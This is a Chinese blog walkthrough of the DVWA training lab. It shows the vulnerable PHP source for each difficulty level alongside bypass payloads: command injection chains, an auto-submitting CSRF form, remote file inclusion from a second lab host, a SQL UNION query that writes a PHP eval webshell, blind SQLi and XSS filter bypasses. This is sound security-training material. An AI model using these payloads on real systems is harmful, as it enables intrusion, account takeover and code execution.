DVWA靶场通关

最新推荐文章于 2024-06-21 19:24:35 发布
最新推荐文章于 2024-06-21 19:24:35 发布
阅读量529 收藏
点赞数
文章标签: php 开发语言 web安全 xss sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Yu3511606536/article/details/125938532
版权

Command Injection

windows cmd命令介绍

执行 ping 127.0.0.1 && ipconfig  符号前后都执行
执行 ping 127.0.0.1 & ipconfig  符号前后都执行

执行 ping 127.0.0.1 || ipconfig 只执行符号前面,除非符号不存在,再执行后面
执行 ping 127.0.0.1 | ipconfig 只执行符号后面
执行 ping 127.0.0.1 ; ipconfig Linux下分隔符

Low

<?php
if( isset( $_POST[ 'Submit' ]  ) ) {
    // Get input
    $target = $_REQUEST[ 'ip' ];

    // Determine OS and execute the ping command.
    if( stristr( php_uname( 's' ), 'Windows NT' ) ) {	//php_uname返回操作系统名称并索字符串在另一字符串中的第一次出现
        // Windows
        $cmd = shell_exec( 'ping  ' . $target );	//执行系统命令
    }
    else {
        // *nix
        $cmd = shell_exec( 'ping  -c 4 ' . $target );	//执行系统命令
    }

    // Feedback for the end user
    echo "<pre>{$cmd}</pre>";
}
?>

POC

127.0.0.1 | ipconfig

127.0.0.1 | echo %cd%

Medium

<?php
if( isset( $_POST[ 'Submit' ]  ) ) {
    // Get input
    $target = $_REQUEST[ 'ip' ];

    // Set blacklist
    $substitutions = array(
        '&&' => '',
        ';'  => '',	//设置黑名单,过滤符号&&和;
    );

    // Remove any of the charactars in the array (blacklist).
    $target = str_replace( array_keys( $substitutions ), $substitutions, $target );	//替换符号

    // Determine OS and execute the ping command.
    if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
        // Windows
        $cmd = shell_exec( 'ping  ' . $target );
    }
    else {
        // *nix
        $cmd = shell_exec( 'ping  -c 4 ' . $target );
    }

    // Feedback for the end user
    echo "<pre>{$cmd}</pre>";
}
?>

分析:

过滤 &&;

POC:

127.0.0.1 & ipconfig

High

<?php

if( isset( $_POST[ 'Submit' ]  ) ) {
    // Get input
    $target = trim($_REQUEST[ 'ip' ]);

    // Set blacklist
    $substitutions = array(
        '&'  => '',
        ';'  => '',
        '| ' => '',
        '-'  => '',
        '$'  => '',
        '('  => '',
        ')'  => '',
        '`'  => '',
        '||' => '',		//黑名单过滤特殊符号
    );

    // Remove any of the charactars in the array (blacklist).
    $target = str_replace( array_keys( $substitutions ), $substitutions, $target );

    // Determine OS and execute the ping command.
    if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
        // Windows
        $cmd = shell_exec( 'ping  ' . $target );
    }
    else {
        // *nix
        $cmd = shell_exec( 'ping  -c 4 ' . $target );
    }

    // Feedback for the end user
    echo "<pre>{$cmd}</pre>";
}
?>

分析:

代码缺陷'| '

POC

127.0.0.1 |ipconfig

CSRF

跨站请求伪造

原理:利用受害者尚未失效的身份认证信息(cookie 、会话等),诱骗点击恶意链接或者访问攻击代码的页面,在受害者不知情大的情况下以受害者的身份向服务器发送请求,从而完成非法操作(转账、改密等)。

CSRF跟XSS最大的区别就是CSRF并没有盗取Cookie而是直接利用

Low

<?php

if( isset( $_GET[ 'Change' ] ) ) {
    // Get input
    $pass_new  = $_GET[ 'password_new' ];
    $pass_conf = $_GET[ 'password_conf' ];

    // Do the passwords match?
    if( $pass_new == $pass_conf ) {
        // They do!
        $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
        $pass_new = md5( $pass_new );	//md5加密

        // Update the database
        $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
        $result = mysqli_query($GLOBALS["___mysqli_ston"],  $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );	//更新数据库

        // Feedback for the user
        echo "<pre>Password Changed.</pre>";
    }
    else {
        // Issue with passwords matching
        echo "<pre>Passwords did not match.</pre>";
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}
?>

分析:

无任何特殊过滤

点击修改,burp抓包生成CSRF POC html页面 来诱导用户点击,或者跟xss联动以链接的形式将poc直接插入到页面中,当用户访问时触发

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form id="test" action="http://192.168.6.138/DVWA/vulnerabilities/csrf/">
      <input type="hidden" name="password&#95;new" value="123" />
      <input type="hidden" name="password&#95;conf" value="123" />
      <input type="hidden" name="Change" value="Change" />
      <input type="submit" value="Submit request" />
    </form>
    <script>		//修改成自动触发
	    function hack(){
		    document.getElementById('test').submit();
	    }
	    setTimeout(hack, 100);
	</script>
  </body>
</html>

Medium

<?php

if( isset( $_GET[ 'Change' ] ) ) {
    // Checks to see where the request came from
    if( stripos( $_SERVER[ 'HTTP_REFERER' ] ,$_SERVER[ 'SERVER_NAME' ]) !== false ) {	//stripos() 函数查找字符串(REFERER)在另一字符串中第一次出现的位置(不区分大小写)
        // Get input
        $pass_new  = $_GET[ 'password_new' ];
        $pass_conf = $_GET[ 'password_conf' ];

        // Do the passwords match?
        if( $pass_new == $pass_conf ) {
            // They do!
            $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));		//过滤特殊符号
            $pass_new = md5( $pass_new );	//md5加密

            // Update the database
            $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
            $result = mysqli_query($GLOBALS["___mysqli_ston"],  $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

            // Feedback for the user
            echo "<pre>Password Changed.</pre>";
        }
        else {
            // Issue with passwords matching
            echo "<pre>Passwords did not match.</pre>";
        }
    }
    else {
        // Didn't come from a trusted source
        echo "<pre>That request didn't look correct.</pre>";
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}
?>

大差不差

服务器端存在referer验证,只能配合文件上传漏洞上传至服务器,用户访问触发

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form id= "test" action="http://192.168.6.138/DVWA/vulnerabilities/csrf/">
      <input type="hidden" name="password&#95;new" value="123" />
      <input type="hidden" name="password&#95;conf" value="123" />
      <input type="hidden" name="Change" value="Change" />
      <input type="submit" value="Submit request" />
    </form>
    <script>		//修改成自动触发
	    function hack(){
		    document.getElementById('test').submit();
	    }
	    setTimeout(hack, 100);
	</script>
  </body>
</html>

High

<?php

if( isset( $_GET[ 'Change' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );		//校验token值

    // Get input
    $pass_new  = $_GET[ 'password_new' ];
    $pass_conf = $_GET[ 'password_conf' ];

    // Do the passwords match?
    if( $pass_new == $pass_conf ) {
        // They do!
        $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));	//过滤特殊符号
        $pass_new = md5( $pass_new );	//md5加密

        // Update the database
        $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
        $result = mysqli_query($GLOBALS["___mysqli_ston"],  $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

        // Feedback for the user
        echo "<pre>Password Changed.</pre>";
    }
    else {
        // Issue with passwords matching
        echo "<pre>Passwords did not match.</pre>";
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

// Generate Anti-CSRF token
generateSessionToken();
?>

分析:

存在一个token验证,每次token值都需要用户身份获取

利用:

token值是根据用户身份请求获取,通过xss漏洞获取,从而再去生成POC

File Inclusion

Low

<?php
// The page we wish to display
$file = $_GET[ 'page' ];	//传参改变访问页面
?>

没有过滤,任意包含,上传一个图片马或者是txt马,包含那个文件就会当php去解析

远程文件包含

http://192.168.6.138/DVWA/vulnerabilities/fi/?page=http://192.168.6.141/hacker.txt&8=phpinfo();

Medium

<?php

// The page we wish to display
$file = $_GET[ 'page' ];

// Input validation
$file = str_replace( array( "http://", "https://" ), "", $file );	//str_replace() 函数替换字符串中的一些字符(区分大小写)
$file = str_replace( array( "../", "..\"" ), "", $file );
?>

双写绕过

http://192.168.6.138/DVWA/vulnerabilities/fi/?page=E:/phpStudy/WWW/DVWA/hackable/uploads/hacker.jpg&8=phpinfo();


http://192.168.6.138/DVWA/vulnerabilities/fi/?page=httphttp://://192.168.6.141/hacker.txt&8=phpinfo();

High

<?php

// The page we wish to display
$file = $_GET[ 'page' ];

// Input validation
if( !fnmatch( "file*", $file ) && $file != "include.php" ) {	//检验传参是否为file开头并且文件名是否为include.php
    // This isn't the page we want!
    echo "ERROR: File not found!";
    exit;
}
?>


http://192.168.6.138/DVWA/vulnerabilities/fi/?page=file://E:/phpStudy/WWW/DVWA/hackable/uploads/hacker.jpg&8=phpinfo();

File Upload

Low

<?php

if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );	//获取文件名

    // Can we move the file to the upload folder?
    if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {		//判断文件是否保存至服务器路径
        // No
        echo '<pre>Your image was not uploaded.</pre>';
    }
    else {
        // Yes!
        echo "<pre>{$target_path} succesfully uploaded!</pre>";
    }
}
?>

没有过滤

Medium

<?php

if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];	//获取文件名
    $uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];	//获取文件类型
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];	//获取文件大小

    // Is it an image?
    if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&
        ( $uploaded_size < 100000 ) ) {		//判断文件类型、大小

        // Can we move the file to the upload folder?
        if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
            // No
            echo '<pre>Your image was not uploaded.</pre>';
        }
        else {
            // Yes!
            echo "<pre>{$target_path} succesfully uploaded!</pre>";
        }
    }
    else {
        // Invalid file
        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
}
?>

绕过:

图片马

mimitype

High

<?php

if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);		//分割字符串。获取文件后缀名
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
    $uploaded_tmp  = $_FILES[ 'uploaded' ][ 'tmp_name' ];

    // Is it an image?
    if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&
        ( $uploaded_size < 100000 ) &&
        getimagesize( $uploaded_tmp ) ) {	//把所有字符转换为小写

        // Can we move the file to the upload folder?
        if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {
            // No
            echo '<pre>Your image was not uploaded.</pre>';
        }
        else {
            // Yes!
            echo "<pre>{$target_path} succesfully uploaded!</pre>";
        }
    }
    else {
        // Invalid file
        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
}
?>

绕过:

图片吗

copy a.jpg/b+1.php hack.jpg

SQL Injection

Low

<?php

if( isset( $_REQUEST[ 'Submit' ] ) ) {
    // Get input
    $id = $_REQUEST[ 'id' ];

    // Check database
    $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

    // Get results
    while( $row = mysqli_fetch_assoc( $result ) ) {		//从结果集中取得一行作为关联数组
        // Get values
        $first = $row["first_name"];
        $last  = $row["last_name"];

        // Feedback for end user
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
    }

    mysqli_close($GLOBALS["___mysqli_ston"]);
}
?>

分析:

1' and '1' = '1>页面回显正常
1' and '1' = '2>页面回显报错

查字段

1' order by 字段数 -- qwe

回显

1.1' union select 1,2 -- qwe

表明

1.1' union select 1,table_name from information_schema.tables where table_schema=database() limit 0,1 -- qwe

写木马

1.1' union select 1,@@datadir -- qwe
获取存储路径:E:\phpStudy\MySQL\data
1.1' union select 1,'<?php eval($_REQUEST[8])?>' into outfile '../../WWW/camer.php' -- qwe

SQLmap一把梭

Medium

<?php

if( isset( $_POST[ 'Submit' ] ) ) {
    // Get input
    $id = $_POST[ 'id' ];

    $id = mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id);	//过滤特殊符号

    $query  = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
    $result = mysqli_query($GLOBALS["___mysqli_ston"], $query) or die( '<pre>' . mysqli_error($GLOBALS["___mysqli_ston"]) . '</pre>' );

    // Get results
    while( $row = mysqli_fetch_assoc( $result ) ) {	//从结果集中取得一行作为关联数组
        // Display values
        $first = $row["first_name"];
        $last  = $row["last_name"];

        // Feedback for end user
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
    }

}

// This is used later on in the index.php page
// Setting it here so we can close the database connection in here like in the rest of the source scripts
$query  = "SELECT COUNT(*) FROM users;";
$result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
$number_of_rows = mysqli_fetch_row( $result )[0];

mysqli_close($GLOBALS["___mysqli_ston"]);
?>

分析:

数字型

1 and 1=1>回显正常
1 and 1=2>回显报错

Sqlmap一把锁

High

<?php

if( isset( $_SESSION [ 'id' ] ) ) {
    // Get input
    $id = $_SESSION[ 'id' ];

    // Check database
    $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";	//控制数据显示
    $result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>Something went wrong.</pre>' );

    // Get results
    while( $row = mysqli_fetch_assoc( $result ) ) {
        // Get values
        $first = $row["first_name"];
        $last  = $row["last_name"];

        // Feedback for end user
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);        
}
?>

POC:

1' order by 2 --+
1' UNION SELECT 1,table_name from information_schema.tables where table_schema=database()#

1' and updatexml(1,concat(0x7e,(SELECT table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e),1)#

SQL Injection-Blind

Low

<?php

if( isset( $_GET[ 'Submit' ] ) ) {
    // Get input
    $id = $_GET[ 'id' ];

    // Check database
    $getid  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $getid ); // Removed 'or die' to suppress mysql errors

    // Get results
    $num = @mysqli_num_rows( $result ); // The '@' character suppresses errors
    if( $num > 0 ) {
        // Feedback for end user
        echo '<pre>User ID exists in the database.</pre>';
    }
    else {
        // User wasn't found, so the page wasn't!
        header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );

        // Feedback for end user
        echo '<pre>User ID is MISSING from the database.</pre>';
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}
?>

分析:

1' and sleep(5) -- qwe>回显延迟
1.1' and sleep(5) -- qwe>回显不延迟

1' and if(2>1, sleep(7), 0) --+

sqlmap

Medium

<?php

if( isset( $_POST[ 'Submit' ]  ) ) {
    // Get input
    $id = $_POST[ 'id' ];
    $id = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $id ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

    // Check database
    $getid  = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $getid ); // Removed 'or die' to suppress mysql errors

    // Get results
    $num = @mysqli_num_rows( $result ); // The '@' character suppresses errors
    if( $num > 0 ) {
        // Feedback for end user
        echo '<pre>User ID exists in the database.</pre>';
    }
    else {
        // Feedback for end user
        echo '<pre>User ID is MISSING from the database.</pre>';
    }

    //mysql_close();
}
?>

改用了 post传参,没有啥区别

High

<?php

if( isset( $_COOKIE[ 'id' ] ) ) {
    // Get input
    $id = $_COOKIE[ 'id' ];

    // Check database
    $getid  = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $getid ); // Removed 'or die' to suppress mysql errors

    // Get results
    $num = @mysqli_num_rows( $result ); // The '@' character suppresses errors
    if( $num > 0 ) {
        // Feedback for end user
        echo '<pre>User ID exists in the database.</pre>';
    }
    else {
        // Might sleep a random amount
        if( rand( 0, 5 ) == 3 ) {
            sleep( rand( 2, 4 ) );
        }

        // User wasn't found, so the page wasn't!
        header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );

        // Feedback for end user
        echo '<pre>User ID is MISSING from the database.</pre>';
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}
?>

从Cookie中取值

XSS-DOM

Low

<div class="vulnerable_code_area">
 
         <p>Please choose a language:</p>
 
        <form name="XSS" method="GET">
            <select name="default">
                <script>
                    if (document.location.href.indexOf("default=") >= 0) {
                        var lang = document.location.href.substring(document.location.href.indexOf("default=")+8);
                        document.write("<option value='" + lang + "'>" + $decodeURI(lang) + "</option>");
                        document.write("<option value='' disabled='disabled'>----</option>");
                    }
 
                    document.write("<option value='English'>English</option>");
                    document.write("<option value='French'>French</option>");
                    document.write("<option value='Spanish'>Spanish</option>");
                    document.write("<option value='German'>German</option>");
                </script>
            </select>
            <input type="submit" value="Select" />
        </form>
</div>

POC

http://192.168.6.138/DVWA/vulnerabilities/xss_d/?default=<script>alert(1)</script>

Medium

<?php

// Is there any input?
if ( array_key_exists( "default", $_GET ) && !is_null ($_GET[ 'default' ]) ) {
    $default = $_GET['default'];
    
    # Do not allow script tags
    if (stripos ($default, "<script") !== false) {		//过滤script标签
        header ("location: ?default=English");
        exit;
    }
}
?>

过滤<script

http://192.168.6.138/DVWA/vulnerabilities/xss_d/?default=</option></select><img src='#' onerror=alert(1) />

High

<?php

// Is there any input?
if ( array_key_exists( "default", $_GET ) && !is_null ($_GET[ 'default' ]) ) {

    # White list the allowable languages
    switch ($_GET['default']) {
        case "French":
        case "English":
        case "German":
        case "Spanish":
            # ok
            break;
        default:
            header ("location: ?default=English");
            exit;
    }
}
?>

使用了白名单过滤

?default=English&<script>alert(1)</script>

XSS-self

Low

<?php

header ("X-XSS-Protection: 0");

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Feedback for end user
    echo '<pre>Hello ' . $_GET[ 'name' ] . '</pre>';
}
?>

<script>alert(1)</script>

Medium

<?php

header ("X-XSS-Protection: 0");

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Get input
    $name = str_replace( '<script>', '', $_GET[ 'name' ] );		//过滤script标签

    // Feedback for end user
    echo "<pre>Hello ${name}</pre>";
}
?>

大小写绕过

<Script>alert(1)</script>

High

<?php

header ("X-XSS-Protection: 0");

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Get input
    $name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET[ 'name' ] );

    // Feedback for end user
    echo "<pre>Hello ${name}</pre>";
}
?>

<script标签被过滤

<img src="#" onerror=alert(1)>

XSS-存储

Low

<?php

if( isset( $_POST[ 'btnSign' ] ) ) {
    // Get input
    $message = trim( $_POST[ 'mtxMessage' ] );
    $name    = trim( $_POST[ 'txtName' ] );

    // Sanitize message input
    $message = stripslashes( $message );
    $message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

    // Sanitize name input
    $name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

    // Update database
    $query  = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

    //mysql_close();
}

?>


<script>alert(1)</script>

Medium

<?php

if( isset( $_POST[ 'btnSign' ] ) ) {
    // Get input
    $message = trim( $_POST[ 'mtxMessage' ] );	//移除字符串两侧的字符
    $name    = trim( $_POST[ 'txtName' ] );

    // Sanitize message input
    $message = strip_tags( addslashes( $message ) );	//剥去字符串中的 HTML 标签
    $message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $message = htmlspecialchars( $message );	//把预定义的字符 "<" (小于)和 ">" (大于)转换为 HTML 实体

    // Sanitize name input
    $name = str_replace( '<script>', '', $name );	//过滤script标签
    $name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

    // Update database
    $query  = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

    //mysql_close();
}
?>

message变量基本把所以XSS标签都进行了过滤,但是name标签只是单纯过滤了script标签,但是name标签限制了输入长度,可以通过前端修改,再构造Poc利用

<img src=c onerror=alert(1)>

High

<?php

if( isset( $_POST[ 'btnSign' ] ) ) {
    // Get input
    $message = trim( $_POST[ 'mtxMessage' ] );
    $name    = trim( $_POST[ 'txtName' ] );

    // Sanitize message input
    $message = strip_tags( addslashes( $message ) );
    $message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $message = htmlspecialchars( $message );

    // Sanitize name input
    $name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $name );		//正则过滤script标签
    $name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

    // Update database
    $query  = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

    //mysql_close();
}
?>

<img src=c onerror=alert(1)>

CSP

Low

https://pastebin.com/raw/R570EE00

Medium

<?php

$headerCSP = "Content-Security-Policy: script-src 'self' 'unsafe-inline' 'nonce-TmV2ZXIgZ29pbmcgdG8gZ2l2ZSB5b3UgdXA=';";

header($headerCSP);

// Disable XSS protections so that inline alert boxes will work
header ("X-XSS-Protection: 0");

# <script nonce="TmV2ZXIgZ29pbmcgdG8gZ2l2ZSB5b3UgdXA=">alert(1)</script>

?>
<?php
if (isset ($_POST['include'])) {
$page[ 'body' ] .= "
    " . $_POST['include'] . "
";
}
$page[ 'body' ] .= '
<form name="csp" method="POST">
    <p>Whatever you enter here gets dropped directly into the page, see if you can get an alert box to pop up.</p>
    <input size="50" type="text" name="include" value="" id="include" />
    <input type="submit" value="Include" />
</form>
';

<script nonce="TmV2ZXIgZ29pbmcgdG8gZ2l2ZSB5b3UgdXA=">alert(1)</script>
L1nYuan
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
DVWA靶场通关实战
qaq517384的博客
11-28 2051
Brute Force Command Injection CSRF File Inclusion File Upload Insecure CAPTCHA SQL Injection SQL Injection Weak Session IDs XSS (DOM) XSS(Reflected) XSS(Stored) CSP Bypass JavaScript
dvwa靶场通关sql injection
07-19
dvwa靶场通关sql injection
DVWA靶场通关(2023)
2301_80548709的博客
02-23 2032
1.这道题是爆破用户名,以及密码,其实就是通过burp软件来爆破抓包成功!接下来爆破修改这两个值,进行爆破,正确导入字典后,开始爆破.因为已经知道了答案,我们可以让爆破的数量少一点,找到数量不一致的,得到结果2.第二种,主要区别在于我们必须休眠两秒,才能继续.所以让它休眠2000ms就欧克了为了方便,我就将正确答案置于了顶端,可以发现,我们的爆破可以保证全为200的状态码3.第三题,通过查询得到,主要增加了token值,这个东西。
DVWA 靶场 Authorisation Bypass 通关解析
最新发布
Flag少侠的博客
06-21 8659
授权绕过(Authorisation Bypass)是一种严重的安全漏洞,攻击者通过利用系统的漏洞或错误配置,绕过正常的访问控制机制,获得未经授权的访问权限。这种漏洞可能导致敏感信息泄露、数据篡改、系统破坏等严重后果。以下是对授权绕过的详细介绍,包括其原理、常见类型、攻击手法、防御措施以及实例分析。一、授权绕过原理授权是指系统在确定用户身份后,根据用户的权限授予相应的资源访问权。授权绕过发生在系统错误地允许未经授权的用户访问受保护的资源时。错误的访问控制逻辑:开发人员在实现访问控制时存在漏洞或错误。
dvwa靶场通关教程(保姆及教学,一看就会)
m0_69043895的博客
04-05 5802
可以看到,Impossible级别的代码对上传文件进行了重命名(为md5值,导致%00截断无法绕过过滤规则),加入Anti-CSRF token防护CSRF攻击,同时对文件的内容作了严格的检查,导致攻击者无法上传含有恶意脚本的文件。让通过验证的情况增加了一种。回到payload,选择第二个爆破点,选择递归模式,recursive grep,设置初始值。看源代码可以发现,不仅限制了文件类型,而且限制了大小,不能少于100kb。可以看到,靶场对文件类型做了限制,只允许上传png、jpeg,并且检查。
DVWA靶场通关(CSRF)
m0_56010012的博客
04-05 3150
CSRF(Cross-site request forgery),翻译过来就是跨站请求伪造,是指利用受害者尚未失效的身份认证信息(cookie、会话等),诱骗其点击恶意链接或者访问包含攻击代码的页面,在受害人不知情的情况下以受害者的身份向(身份认证信息所对应的)服务器发送请求,从而完成非法操作(如转账、改密等)。 CSRF与XSS最大的区别就在于,CSRF并没有盗取cookie而是直接利用。而最常见的就是QQ空间的登陆。 CSRF属于业务逻辑漏洞,服务器信任经过身份认证的用户。 XSS属于技术漏洞,客
dvwa靶场通关(一)
qq_65950075的博客
05-24 1349
